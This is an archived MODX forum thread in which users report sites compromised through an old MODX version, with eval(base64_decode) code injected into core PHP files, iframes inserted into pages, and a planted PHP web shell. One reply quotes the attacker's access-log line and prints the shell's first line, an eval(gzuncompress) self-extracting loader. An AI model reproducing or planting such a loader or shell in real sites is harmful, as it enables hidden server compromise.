We launched new forums in March 2019—join us there. In a hurry for help with your website? Get Help Now!
MODX Community Forums Archive

infected by iframe hack :(

    • 18913
    • 654 Posts
    mconsidine Reply #81, 13 years, 7 months ago
    I wonder if this contributed to the problem
    http://bugs.modx.com/browse/MODX-2281
    with more detail here
    http://packetstormsecurity.org/1008-exploits/modx-xssxsrf.txt
    Hopefully that will get taken care of in the next release???
    Matt
      • 15303
      • 4 Posts
      kal_exan Reply #82, 13 years, 7 months ago
      I discovered the same for one of my sites too:
      - manager/includes/document.parser.class.inc.php had an eval(base64(...)) code at the end
      - there was a probably randomly named php file at assets/docs that contained binary data ready to be server (from the header it seamed to be a zip file data)

      modx version 1.0.2
      ajaxsearch 1.8.4
      hosted at hostgator servers

      So is it ajax search for sure? Any Updates on this?

      Thank you in advance!
      • Ryan Thrash Reply #83, 13 years, 7 months ago
        If you have a file called /snippets/ajaxsearch/ajax.php on your file system, it could be the cause. That was removed in the 1.0.3 update which was essentially labeled as a "if you don’t upgrade you’ll likely get hacked" must upgrade release, as was 1.0.4. 1.0.3 and later included several security updates ... see the security thread in the Important announcements (also fed directly to your manager every time you login) for more information.

          Ryan Thrash, MODX Co-Founder
          Follow me on Twitter at @rthrash or catch my occasional unofficial thoughts at thrash.me
          • 15303
          • 4 Posts
          kal_exan Reply #84, 13 years, 7 months ago
          I do indeed have a not updated version of modx (I have upgraded the site to 1.0.4), but there was not a /snippets/ajaxsearch/ajax.php file at my file system. Maybe the security hole is somewhere else?
          • Ryan Thrash Reply #85, 13 years, 7 months ago
            Please see the security threads under important announcements. You need to upgrade.
              Ryan Thrash, MODX Co-Founder
              Follow me on Twitter at @rthrash or catch my occasional unofficial thoughts at thrash.me
              • 13137
              • 204 Posts
              islander Reply #86, 13 years, 5 months ago
              I too just discovered that I had two infected "eval(base64_decode" files (manager/includes/document.parser.class.inc.php & manager/includes/protect.inc.php) that was injecting an iframe at random intervals into pages.

              This was not an upgrade and I am using v1.0.4 at Hostgater.
              Oddly enough, I am using a DynamicDrive script on the site, which someone mentioned in an earlier thread.
              I am not using any ajax search on the site.
              • opengeek Reply #87, 13 years, 5 months ago
                Quote from: islander at Oct 29, 2010, 08:29 PM

                I too just discovered that I had two infected "eval(base64_decode" files (manager/includes/document.parser.class.inc.php & manager/includes/protect.inc.php) that was injecting an iframe at random intervals into pages.

                This was not an upgrade and I am using v1.0.4 at Hostgater.
                Oddly enough, I am using a DynamicDrive script on the site, which someone mentioned in an earlier thread.
                I am not using any ajax search on the site.
                Are you referring to this extra?
                  Jason Coward
                  Chief Architect @ MODX
                  http://www.jasoncoward.com | http://twitter.com/drumshaman | https://github.com/opengeek
                  • 13137
                  • 204 Posts
                  islander Reply #88, 13 years, 5 months ago
                  Quote from: OpenGeek at Oct 29, 2010, 10:02 PM

                  Are you referring to this extra?
                  Ah, no. Not this time. On a previous site I think I had something similar to that for MM for maxigalery. But not on this site.
                    • 13137
                    • 204 Posts
                    islander Reply #89, 13 years, 5 months ago
                    I just received this back from Hostgater:

                    PHP shell placed into the account via exploiting ModX. Please check for updates.

                    How the second site was altered:
                    80.190.200.157 - - [29/Oct/2010:03:27:46 -0500] "POST /assets/files/xmlrpck.php?pird HTTP/1.1" 200 31464 "-" "-"

                    The file "xmlrpck.php" had its permissions set via shell, therefor I could not delete it from ftp. It was also encrypted or compressed.
                    First line was:
                    <?php list(,$zip) = explode("ZIP"."_BEGIN",file_get_contents(__FILE__));eval(gzuncompress($zip));die;?>ZIP_BEGINxÚì½isI’ ú￾füYÙœPA\<@Š,ñ&("ž’–
                    • opengeek Reply #90, 13 years, 5 months ago
                      Not sure why you are posting this stuff here tbh. If Hostgator is blaming MODx for the exploit, they need to identify the vector; otherwise, they need to identify the vector before blaming MODx.
                        Jason Coward
                        Chief Architect @ MODX
                        http://www.jasoncoward.com | http://twitter.com/drumshaman | https://github.com/opengeek